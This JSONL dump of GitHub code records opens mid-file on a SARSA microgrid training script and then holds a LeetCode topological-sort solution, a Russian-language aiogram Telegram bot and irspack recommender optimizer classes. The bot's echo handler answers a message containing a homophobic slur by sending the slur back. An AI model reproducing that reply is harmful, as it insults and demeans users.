print('Explored out of bounds, next episode')\n print('i : ', i, 'highest V : ', highest_V, 'average_reward : ', avg_reward)\n break\n\n\ndef train_sarsa(prev_vf = None , new_vf = 'new_vf_weights', episode_num = 20, episode_steps = 90, \n action_delay = 2, exploration_rate = 0.12, alpha = 0.01, beta = 0.01):\n \n print('Starting training with SARSA for {}'.format(new_vf))\n\n #convert time to iterations\n action_freq = int(action_delay/T)\n\n # Initialize Network\n network = MicrogridsNetwork()\n episode = 0\n\n sa = SarsaController(exp_rate= exploration_rate , beta = beta)\n vf = ValueFunction(alpha)\n\n #Use previous value function\n if(prev_vf != None):\n with open('Value_Functions/{}.p'.format(prev_vf), 'rb') as pfile:\n vf.weights = pickle.load(pfile)\n\n while(episode < episode_num):\n\n sa.run(network, vf, steps=episode_steps, inner_steps=150, idle_iter = action_freq, debug=False)\n episode +=1\n print('episode ' , episode, 'time : ', \"{:.2f}\".format(episode*episode_steps*action_freq*T),' seconds')\n\n #Store value function using pickles\n with open('Value_Functions/{}.p'.format(new_vf), 'wb') as pfile:\n pickle.dump(vf.weights, pfile)\n \n network.plot(timetoplot = int(episode_num*episode_steps*action_freq*T) )\n\n", "repo_name": "Maxime00/Microgrids_Project", "sub_path": "Final_Model/SARSA_Controller.py", "file_name": "SARSA_Controller.py", "file_ext": "py", "file_size_in_byte": 4624, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "itertools.product", "line_number": 34, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 48, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 49, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 67, "usage_type": "call"}, {"api_name": "vf_tile_coding_approx.ValueFunction", "line_number": 122, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 127, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 137, "usage_type": "call"}]}
+{"seq_id": "38795657412", "text": "class Solution:\n def canFinish(self, numCourses: int, prerequisites):\n import collections\n # 存储有向图\n edges = collections.defaultdict(list)\n # 存储每个节点的入度\n indeg = [0] * numCourses\n for info in prerequisites:\n edges[info[1]].append(info[0])\n indeg[info[0]] += 1\n # 将所有入度为 0 的节点放入队列中\n q = collections.deque([u for u in range(numCourses) if indeg[u] == 0])\n while q:\n # 从队首取出一个节点\n u = q.popleft()\n for v in edges[u]:\n indeg[v] -= 1\n if indeg[v] == 0:\n q.append(v)\n for i in indeg:\n if i > 0:\n return False\n return True\n", "repo_name": "saycmily/vtk-and-python", "sub_path": "leecode/1-500/201-300/207-课程表.py", "file_name": "207-课程表.py", "file_ext": "py", "file_size_in_byte": 797, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 5, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "33395522802", "text": "import logging\nimport config\nimport keyboards as kb\nimport telegramcalendar as tgcalendar\nimport spreadsheet\nimport data\nfrom aiogram import Bot, Dispatcher, executor, types\n\n# Configure logging\nlogging.basicConfig(level=logging.INFO)\n# Initialize bot and dispatcher\nbot = Bot(token=config.API_TOKEN)\ndp = Dispatcher(bot)\n\n\n@dp.callback_query_handler(lambda c: c.data == 'button1')\nasync def process_callback_button1(callback_query: types.CallbackQuery):\n await bot.answer_callback_query(callback_query.id)\n await bot.send_message(callback_query.from_user.id, 'Нажата первая кнопка!')\n\n\n@dp.callback_query_handler(lambda c: c.data.startswith('recall'))\nasync def process_callback_button1(callback_query: types.CallbackQuery):\n if callback_query.data == 'recall_yes':\n data.collect_data('Да', callback_query.from_user.id)\n await bot.send_message(callback_query.from_user.id, 'Отлично, мы вам перезвоним')\n if callback_query.data == 'recall_no':\n data.collect_data('Нет', callback_query.from_user.id)\n await bot.send_message(callback_query.from_user.id, 'Хорошо, приходите на праздник!')\n await bot.answer_callback_query(callback_query.id)\n\n\n@dp.callback_query_handler(lambda c: c.data.startswith('program'))\nasync def process_callback_button1(callback_query: types.CallbackQuery):\n await bot.answer_callback_query(callback_query.id)\n data.collect_data(callback_query.data, callback_query.from_user.id)\n await bot.edit_message_text(text=f'Вы выбрали {callback_query.data[7]} программу',\n chat_id=callback_query.message.chat.id,\n message_id=callback_query.message.message_id)\n await bot.send_message(callback_query.from_user.id, 'Пожалуйста, напишите свой номер телефона')\n\n\n@dp.callback_query_handler(lambda c: c.data == 'yes' or c.data == 'no')\nasync def choose_callback(callback_query: types.CallbackQuery):\n if callback_query.data == 'yes':\n await bot.edit_message_text(text=f\"Пожалуйста, выберите программу\",\n chat_id=callback_query.message.chat.id,\n message_id=callback_query.message.message_id,\n reply_markup=kb.program)\n elif callback_query.data == 'no':\n await bot.edit_message_text(text=f\"Ясно!\",\n chat_id=callback_query.message.chat.id,\n message_id=callback_query.message.message_id)\n else:\n await bot.edit_message_text(text=f\"Что-то пошло не так :(\",\n chat_id=callback_query.message.chat.id,\n message_id=callback_query.message.message_id)\n await bot.answer_callback_query(callback_query.id)\n\n\n@dp.callback_query_handler(lambda c: c.data)\nasync def callback_calendar(callback_query: types.CallbackQuery):\n response = tgcalendar.process_calendar_selection(bot, callback_query)\n data.collect_data(response[2], callback_query.from_user.id)\n await response[0]\n await bot.answer_callback_query(callback_query.id)\n\n\n@dp.message_handler(commands=['calendar'])\nasync def calendar(message: types.Message):\n cld = tgcalendar.create_calendar()\n await message.answer('Пожалуйтса, выберите дату:', reply_markup=cld)\n\n\n@dp.message_handler(lambda c: c.text[0] == '+' or c.text[0] + c.text[1] == '80')\nasync def test(message: types.Message):\n data.collect_data(message.text, message.from_user.id)\n await message.answer(f'Супер!\\n{message.from_user.first_name}, хотите ли вы, чтобы мы вам перезвонили?',\n reply_markup=kb.recall)\n\n\n@dp.message_handler(commands=['1'])\nasync def process_command_1(message: types.Message):\n markup = kb.inline_kb1\n await message.reply(\"Первая инлайн кнопка\", reply_markup=markup)\n\n\n@dp.message_handler(commands=['start', 'help'])\nasync def send_welcome(message: types.Message):\n \"\"\"\n This handler will be called when user sends `/start` or `/help` command\n \"\"\"\n await message.answer(\"Здарова!\\n\"\n \"Я тестовый бот\\n\"\n \"Напиши /calendar чтобы протестировать самую свежую функцию!\")\n\n\n@dp.message_handler(commands=['rm'])\nasync def removekb(message: types.Message):\n await message.answer('Removed!', reply_markup=kb.ReplyKeyboardRemove())\n\n\n@dp.message_handler(commands=['ping'])\nasync def pong(message: types.Message):\n await message.reply('pong')\n\n\n@dp.message_handler()\nasync def echo(message: types.Message):\n text = message.text.lower()\n if text.find('пидор') == -1:\n await message.answer(message.text)\n else:\n await message.answer('Сам пидор!')\n print(message.from_user.full_name, message.text)\n\n\nif __name__ == '__main__':\n executor.start_polling(dp)\n", "repo_name": "VanderY/TGBot", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 5140, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 10, "usage_type": "attribute"}, {"api_name": "aiogram.Bot", "line_number": 12, "usage_type": "call"}, {"api_name": "config.API_TOKEN", "line_number": 12, "usage_type": "attribute"}, {"api_name": "aiogram.Dispatcher", "line_number": 13, "usage_type": "call"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 17, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 17, "usage_type": "name"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 23, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 23, "usage_type": "name"}, {"api_name": "data.collect_data", "line_number": 25, "usage_type": "call"}, {"api_name": "data.collect_data", "line_number": 28, "usage_type": "call"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 34, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 34, "usage_type": "name"}, {"api_name": "data.collect_data", "line_number": 36, "usage_type": "call"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 44, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 44, "usage_type": "name"}, {"api_name": "keyboards.program", "line_number": 49, "usage_type": "attribute"}, {"api_name": "aiogram.types.CallbackQuery", "line_number": 62, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 62, "usage_type": "name"}, {"api_name": "telegramcalendar.process_calendar_selection", "line_number": 63, "usage_type": "call"}, {"api_name": "data.collect_data", "line_number": 64, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 70, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 70, "usage_type": "name"}, {"api_name": "telegramcalendar.create_calendar", "line_number": 71, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 76, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 76, "usage_type": "name"}, {"api_name": "data.collect_data", "line_number": 77, "usage_type": "call"}, {"api_name": "keyboards.recall", "line_number": 79, "usage_type": "attribute"}, {"api_name": "aiogram.types.Message", "line_number": 83, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 83, "usage_type": "name"}, {"api_name": "keyboards.inline_kb1", "line_number": 84, "usage_type": "attribute"}, {"api_name": "aiogram.types.Message", "line_number": 89, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 89, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 99, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 99, "usage_type": "name"}, {"api_name": "keyboards.ReplyKeyboardRemove", "line_number": 100, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 104, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 104, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 109, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 109, "usage_type": "name"}, {"api_name": "aiogram.executor.start_polling", "line_number": 119, "usage_type": "call"}, {"api_name": "aiogram.executor", "line_number": 119, "usage_type": "name"}]}
+{"seq_id": "33818302092", "text": "import logging\nfrom typing import Any, Dict, List, Optional\n\nfrom irspack.definitions import InteractionMatrix\n\nfrom ..evaluator import Evaluator\nfrom ..optimizers.base_optimizer import (\n BaseOptimizer,\n BaseOptimizerWithEarlyStopping,\n LowMemoryError,\n)\nfrom ..parameter_tuning import (\n CategoricalSuggestion,\n IntegerSuggestion,\n LogUniformSuggestion,\n Suggestion,\n UniformSuggestion,\n)\nfrom ..recommenders import (\n AsymmetricCosineKNNRecommender,\n AsymmetricCosineUserKNNRecommender,\n CosineKNNRecommender,\n CosineUserKNNRecommender,\n DenseSLIMRecommender,\n EDLAERecommender,\n IALSRecommender,\n JaccardKNNRecommender,\n P3alphaRecommender,\n RP3betaRecommender,\n SLIMRecommender,\n TopPopRecommender,\n TverskyIndexKNNRecommender,\n)\n\ndefault_tune_range_knn = [\n IntegerSuggestion(\"top_k\", 4, 1000),\n UniformSuggestion(\"shrinkage\", 0, 1000),\n]\n\ndefault_tune_range_knn_with_weighting = [\n IntegerSuggestion(\"top_k\", 4, 1000),\n UniformSuggestion(\"shrinkage\", 0, 1000),\n CategoricalSuggestion(\"feature_weighting\", [\"NONE\", \"TF_IDF\", \"BM_25\"]),\n]\n\n\ndef _get_maximal_n_components_for_budget(\n X: InteractionMatrix, budget: int, n_component_max_default: int\n) -> int:\n return min(int((budget * 1e6) / (8 * (sum(X.shape) + 1))), n_component_max_default)\n\n\nclass TopPopOptimizer(BaseOptimizer):\n default_tune_range: List[Suggestion] = []\n recommender_class = TopPopRecommender\n\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n return []\n\n\nclass IALSOptimizer(BaseOptimizerWithEarlyStopping):\n default_tune_range = [\n IntegerSuggestion(\"n_components\", 4, 300),\n LogUniformSuggestion(\"alpha0\", 3e-3, 1),\n LogUniformSuggestion(\"reg\", 1e-4, 1e-1),\n ]\n recommender_class = IALSRecommender\n\n def __init__(\n self,\n data: InteractionMatrix,\n val_evaluator: Evaluator,\n logger: Optional[logging.Logger] = None,\n suggest_overwrite: List[Suggestion] = [],\n fixed_params: Dict[str, Any] = {},\n max_epoch: int = 16,\n validate_epoch: int = 1,\n score_degradation_max: int = 5,\n ):\n super().__init__(\n data,\n val_evaluator,\n logger=logger,\n suggest_overwrite=suggest_overwrite,\n fixed_params=fixed_params,\n max_epoch=max_epoch,\n validate_epoch=validate_epoch,\n score_degradation_max=score_degradation_max,\n )\n\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n n_components = _get_maximal_n_components_for_budget(X, memory_budget, 300)\n return [\n IntegerSuggestion(\"n_components\", 4, n_components),\n ]\n\n\nclass DenseSLIMOptimizer(BaseOptimizer):\n default_tune_range: List[Suggestion] = [LogUniformSuggestion(\"reg\", 1, 1e4)]\n recommender_class = DenseSLIMRecommender\n\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n n_items: int = X.shape[1]\n if (1e6 * memory_budget) < (4 * 2 * n_items ** 2):\n raise LowMemoryError(\n f\"Memory budget {memory_budget} too small for DenseSLIM to work.\"\n )\n return []\n\n\nclass EDLAEOptimizer(BaseOptimizer):\n default_tune_range: List[Suggestion] = [\n LogUniformSuggestion(\"reg\", 1, 1e4),\n UniformSuggestion(\"dropout_p\", 0.0, 0.99),\n ]\n recommender_class = EDLAERecommender\n\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n n_items: int = X.shape[1]\n if (1e6 * memory_budget) < (4 * 2 * n_items ** 2):\n raise LowMemoryError(\n f\"Memory budget {memory_budget} too small for EDLAE to work.\"\n )\n return []\n\n\ntry:\n from irspack.recommenders import NMFRecommender, TruncatedSVDRecommender\n\n class TruncatedSVDOptimizer(BaseOptimizer):\n default_tune_range = [IntegerSuggestion(\"n_components\", 4, 512)]\n recommender_class = TruncatedSVDRecommender\n\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n n_components = _get_maximal_n_components_for_budget(X, memory_budget, 512)\n return [\n IntegerSuggestion(\"n_components\", 4, n_components),\n ]\n\n class NMFOptimizer(BaseOptimizer):\n default_tune_range = [\n IntegerSuggestion(\"n_components\", 4, 512),\n LogUniformSuggestion(\"alpha\", 1e-10, 1e-1),\n UniformSuggestion(\"l1_ratio\", 0, 1),\n ]\n recommender_class = NMFRecommender\n\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n n_components = _get_maximal_n_components_for_budget(X, memory_budget, 512)\n return [\n IntegerSuggestion(\"n_components\", 4, n_components),\n ]\n\n\nexcept ImportError: # pragma: no cover\n pass # pragma: no cover\n\n\nclass SimilarityBasedOptimizerBase(BaseOptimizer):\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n top_k_max = min(int(1e6 * memory_budget / 4 // (X.shape[1] + 1)), 1024)\n if top_k_max <= 4:\n raise LowMemoryError(\n f\"Memory budget {memory_budget} too small for {cls.__name__} to work.\"\n )\n\n return [\n IntegerSuggestion(\"top_k\", 4, top_k_max),\n ]\n\n\nclass SLIMOptimizer(SimilarityBasedOptimizerBase):\n default_tune_range = [\n LogUniformSuggestion(\"alpha\", 1e-5, 1),\n UniformSuggestion(\"l1_ratio\", 0, 1),\n ]\n recommender_class = SLIMRecommender\n\n\nclass P3alphaOptimizer(SimilarityBasedOptimizerBase):\n default_tune_range = [\n IntegerSuggestion(\"top_k\", low=10, high=1000),\n CategoricalSuggestion(\"normalize_weight\", [True, False]),\n ]\n recommender_class = P3alphaRecommender\n\n\nclass RP3betaOptimizer(SimilarityBasedOptimizerBase):\n default_tune_range = [\n IntegerSuggestion(\"top_k\", 2, 1000),\n LogUniformSuggestion(\"beta\", 1e-5, 5e-1),\n CategoricalSuggestion(\"normalize_weight\", [True, False]),\n ]\n recommender_class = RP3betaRecommender\n\n\nclass CosineKNNOptimizer(SimilarityBasedOptimizerBase):\n default_tune_range = default_tune_range_knn_with_weighting.copy() + [\n CategoricalSuggestion(\"normalize\", [False, True])\n ]\n\n recommender_class = CosineKNNRecommender\n\n\nclass AsymmetricCosineKNNOptimizer(SimilarityBasedOptimizerBase):\n default_tune_range = default_tune_range_knn_with_weighting + [\n UniformSuggestion(\"alpha\", 0, 1)\n ]\n\n recommender_class = AsymmetricCosineKNNRecommender\n\n\nclass JaccardKNNOptimizer(SimilarityBasedOptimizerBase):\n\n default_tune_range = default_tune_range_knn.copy()\n recommender_class = JaccardKNNRecommender\n\n\nclass TverskyIndexKNNOptimizer(SimilarityBasedOptimizerBase):\n default_tune_range = default_tune_range_knn.copy() + [\n UniformSuggestion(\"alpha\", 0, 2),\n UniformSuggestion(\"beta\", 0, 2),\n ]\n\n recommender_class = TverskyIndexKNNRecommender\n\n\nclass UserSimilarityBasedOptimizerBase(BaseOptimizer):\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n top_k_max = min(int(1e6 * memory_budget / 4 // (X.shape[0] + 1)), 1024)\n return [\n IntegerSuggestion(\"top_k\", 4, top_k_max),\n ]\n\n\nclass CosineUserKNNOptimizer(UserSimilarityBasedOptimizerBase):\n default_tune_range = default_tune_range_knn_with_weighting.copy() + [\n CategoricalSuggestion(\"normalize\", [False, True])\n ]\n\n recommender_class = CosineUserKNNRecommender\n\n\nclass AsymmetricCosineUserKNNOptimizer(UserSimilarityBasedOptimizerBase):\n default_tune_range = default_tune_range_knn_with_weighting + [\n UniformSuggestion(\"alpha\", 0, 1)\n ]\n\n recommender_class = AsymmetricCosineUserKNNRecommender\n\n\ntry:\n from ..recommenders.bpr import BPRFMRecommender\n\n class BPRFMOptimizer(BaseOptimizerWithEarlyStopping):\n default_tune_range = [\n IntegerSuggestion(\"n_components\", 4, 256),\n LogUniformSuggestion(\"item_alpha\", 1e-9, 1e-2),\n LogUniformSuggestion(\"user_alpha\", 1e-9, 1e-2),\n CategoricalSuggestion(\"loss\", [\"bpr\", \"warp\"]),\n ]\n recommender_class = BPRFMRecommender\n\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n # memory usage will be roughly 4 (float) * (n_users + n_items) * k\n n_components = _get_maximal_n_components_for_budget(X, memory_budget, 300)\n return [\n IntegerSuggestion(\"n_components\", 4, n_components),\n ]\n\n\nexcept: # pragma: no cover\n pass # pragma: no cover\n\n\ntry:\n from ..recommenders.multvae import MultVAERecommender\n\n class MultVAEOptimizer(BaseOptimizerWithEarlyStopping):\n default_tune_range = [\n CategoricalSuggestion(\"dim_z\", [32, 64, 128, 256]),\n CategoricalSuggestion(\"enc_hidden_dims\", [128, 256, 512]),\n CategoricalSuggestion(\"kl_anneal_goal\", [0.1, 0.2, 0.4]),\n ]\n recommender_class = MultVAERecommender\n\n @classmethod\n def tune_range_given_memory_budget(\n cls, X: InteractionMatrix, memory_budget: int\n ) -> List[Suggestion]:\n if memory_budget * 1e6 > (X.shape[1] * 2048 * 8):\n raise LowMemoryError(\n f\"Memory budget {memory_budget} too small for MultVAE to work.\"\n )\n\n return []\n\n\nexcept: # pragma: no cover\n pass # pragma: no cover\n", "repo_name": "caijunyang308/irspack", "sub_path": "irspack/optimizers/_optimizers.py", "file_name": "_optimizers.py", "file_ext": "py", "file_size_in_byte": 10167, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 36, "usage_type": "call"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 37, "usage_type": "call"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 41, "usage_type": "call"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 42, "usage_type": "call"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 43, "usage_type": "call"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 48, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizer", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 54, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 54, "usage_type": "name"}, {"api_name": "recommenders.TopPopRecommender", "line_number": 55, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 60, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 60, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizerWithEarlyStopping", "line_number": 64, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 66, "usage_type": "call"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 67, "usage_type": "call"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 68, "usage_type": "call"}, {"api_name": "recommenders.IALSRecommender", "line_number": 70, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 74, "usage_type": "name"}, {"api_name": "evaluator.Evaluator", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 76, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 76, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 77, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 77, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 78, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 78, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 96, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 100, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 97, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 97, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizer", "line_number": 104, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 105, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 105, "usage_type": "name"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 105, "usage_type": "call"}, {"api_name": "recommenders.DenseSLIMRecommender", "line_number": 106, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 110, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.LowMemoryError", "line_number": 114, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 111, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 111, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizer", "line_number": 120, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 121, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 121, "usage_type": "name"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 122, "usage_type": "call"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 123, "usage_type": "call"}, {"api_name": "recommenders.EDLAERecommender", "line_number": 125, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 129, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.LowMemoryError", "line_number": 133, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 130, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 130, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizer", "line_number": 142, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 143, "usage_type": "call"}, {"api_name": "irspack.recommenders.TruncatedSVDRecommender", "line_number": 144, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 148, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 152, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 149, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 149, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizer", "line_number": 155, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 157, "usage_type": "call"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 158, "usage_type": "call"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 159, "usage_type": "call"}, {"api_name": "irspack.recommenders.NMFRecommender", "line_number": 161, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 165, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 169, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 166, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 166, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizer", "line_number": 177, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 180, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.LowMemoryError", "line_number": 184, "usage_type": "call"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 189, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 181, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 181, "usage_type": "name"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 195, "usage_type": "call"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 196, "usage_type": "call"}, {"api_name": "recommenders.SLIMRecommender", "line_number": 198, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 203, "usage_type": "call"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 204, "usage_type": "call"}, {"api_name": "recommenders.P3alphaRecommender", "line_number": 206, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 211, "usage_type": "call"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 212, "usage_type": "call"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 213, "usage_type": "call"}, {"api_name": "recommenders.RP3betaRecommender", "line_number": 215, "usage_type": "name"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 220, "usage_type": "call"}, {"api_name": "recommenders.CosineKNNRecommender", "line_number": 223, "usage_type": "name"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 228, "usage_type": "call"}, {"api_name": "recommenders.AsymmetricCosineKNNRecommender", "line_number": 231, "usage_type": "name"}, {"api_name": "recommenders.JaccardKNNRecommender", "line_number": 237, "usage_type": "name"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 242, "usage_type": "call"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 243, "usage_type": "call"}, {"api_name": "recommenders.TverskyIndexKNNRecommender", "line_number": 246, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizer", "line_number": 249, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 252, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 256, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 253, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 253, "usage_type": "name"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 262, "usage_type": "call"}, {"api_name": "recommenders.CosineUserKNNRecommender", "line_number": 265, "usage_type": "name"}, {"api_name": "parameter_tuning.UniformSuggestion", "line_number": 270, "usage_type": "call"}, {"api_name": "recommenders.AsymmetricCosineUserKNNRecommender", "line_number": 273, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizerWithEarlyStopping", "line_number": 279, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 281, "usage_type": "call"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 282, "usage_type": "call"}, {"api_name": "parameter_tuning.LogUniformSuggestion", "line_number": 283, "usage_type": "call"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 284, "usage_type": "call"}, {"api_name": "recommenders.bpr.BPRFMRecommender", "line_number": 286, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 290, "usage_type": "name"}, {"api_name": "parameter_tuning.IntegerSuggestion", "line_number": 295, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 291, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 291, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.BaseOptimizerWithEarlyStopping", "line_number": 306, "usage_type": "name"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 308, "usage_type": "call"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 309, "usage_type": "call"}, {"api_name": "parameter_tuning.CategoricalSuggestion", "line_number": 310, "usage_type": "call"}, {"api_name": "recommenders.multvae.MultVAERecommender", "line_number": 312, "usage_type": "name"}, {"api_name": "irspack.definitions.InteractionMatrix", "line_number": 316, "usage_type": "name"}, {"api_name": "optimizers.base_optimizer.LowMemoryError", "line_number": 319, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 317, "usage_type": "name"}, {"api_name": "parameter_tuning.Suggestion", "line_number": 317, "usage_type": "name"}]}
